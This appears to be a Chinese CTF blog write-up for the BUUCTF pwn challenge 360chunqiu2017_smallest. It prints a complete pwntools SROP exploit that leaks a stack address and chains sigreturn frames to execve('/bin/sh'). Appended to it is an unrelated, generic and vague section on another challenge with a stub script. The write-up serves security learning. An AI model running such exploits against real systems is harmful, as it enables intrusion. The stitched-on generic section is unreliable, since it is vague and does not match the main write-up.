BUUCTF Pwn 360chunqiu2017_smallest 题解

1.下载 得到文件 checksec exeinfo:

64位 拖入IDA64 

只有一个函数 看汇编:

进行了read操作 read的返回值是读取字符数 可以利用这一点进行SROP

要进行SROP 要有binsh地址 所以首先需要泄露栈地址:

start_addr = 0x4000B0
sysret_addr = 0x4000BE
payload = p64(start_addr) * 3

p.send(payload)
p.send(b'\xB3')
#第一个start_addr读取到0xB3 会将第二个start_addr跳过rax清零的步骤
#从而让rax变成1执行write泄露栈地址
#这时传入第三个start_addr填充,然后会泄露栈地址

stack = u64(p.recv()[0x8:0x10])
print(hex(stack))

接着就是要构造sigreturen 将SP移动到泄露地址上 方便得到binsh地址偏移

需要构造两段frame 第一段用于将返回地址跳到stack 第二段用于执行execve

exp:

from pwn import *

p = process('./small')
context.arch = 'amd64'
start_addr = 0x4000B0
sysret_addr = 0x4000BE
payload = p64(start_addr) * 3

p.send(payload)
p.send(b'\xB3')
#第一个start_addr读取到0xB3 会将第二个start_addr跳过rax清零的步骤
#从而让rax变成1执行write泄露栈地址
#这时传入第三个start_addr填充,然后会泄露栈地址

stack = u64(p.recv()[0x8:0x10])
print(hex(stack))

frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = stack
frame.rdx = 0x400
frame.rsp = stack
frame.rip = sysret_addr


payload = p64(start_addr) + b'a' * 8 + bytes(frame)
p.send(payload)
#这里是将8个a及frame压入栈中 方便等会syscall
#8个a的作用:在执行这段的start_addr时 SP正指向这8个a
#这时候再read syscall就会覆盖8个a

sig_payload = p64(sysret_addr) + b'b' * 7
p.send(sig_payload)
#这段payload用于将8个a覆盖为syscall
#并且让read读取15个字节 rax=15 方便sigreturn

frame.rax = constants.SYS_execve
frame.rdi = stack + 0x200
#这里的 0x200 可以写成任意小于read最大读取量且大于payload在frame前长度的值
#偏移自己定
frame.rsi = 0
frame.rdx = 0
frame.rip = sysret_addr

frame_payload = p64(start_addr) + b'b' * 8 + bytes(frame)
frame_payload = frame_payload.ljust(0x200, b'a') + b'/bin/sh\x00'
p.send(frame_payload)
p.send(sig_payload)
#这里send这个的意思是用syscall覆盖8个b 并且将rax设置为15
p.interactive()

本地能打通 线上找好久都没找到打通的方法

### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成该挑战,需了解所使用的`libc`版本特性以及其对应的函数偏移地址等信息。这有助于定位并利用可能存在的漏洞点。此外,还需掌握基本的反汇编技能以便理解二进制文件的工作原理。 #### 漏洞分析 通过对程序逻辑的研究发现存在一处可以被攻击者控制的数据输入路径。当用户提交恶意构造的数据时,能够覆盖返回地址从而改变正常流程指向自定义指令序列的位置。这种技术被称为“Return-Oriented Programming (ROP)” 或直接注入 shellcode 执行。 #### Shellcode 构建 考虑到现代操作系统防护机制如NX bit 和 ASLR 的存在,在构建有效载荷时需要特别注意避开非法字符以免破坏栈结构完整性。同时也要考虑如何绕过这些安全措施以确保 payload 成功运行。一种常见做法是从内存中寻找可写区域作为跳转目标,并在那里放置精心设计过的 machine code 来打开 shell 或连接远程服务器发送 flag。 ```python from pwn import * context.arch = 'amd64' context.os = 'linux' # 连接至服务端口 conn = remote('challenge_address', port_number) # 发送payload前先读取一些数据防止阻塞 conn.recvuntil(b'Input your choice:') ``` #### Exploit 实现 最终解决方案涉及多个部分协同工作:首先是找到合适的 gadget 组合用于泄露 libc 基址;其次是计算出 system() 函数的确切位置;最后则是巧妙安排参数传递方式使得 execve("/bin/sh", ...) 能够被执行。整个过程要求精确控制每一步操作以达到预期效果而不触发任何异常终止条件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值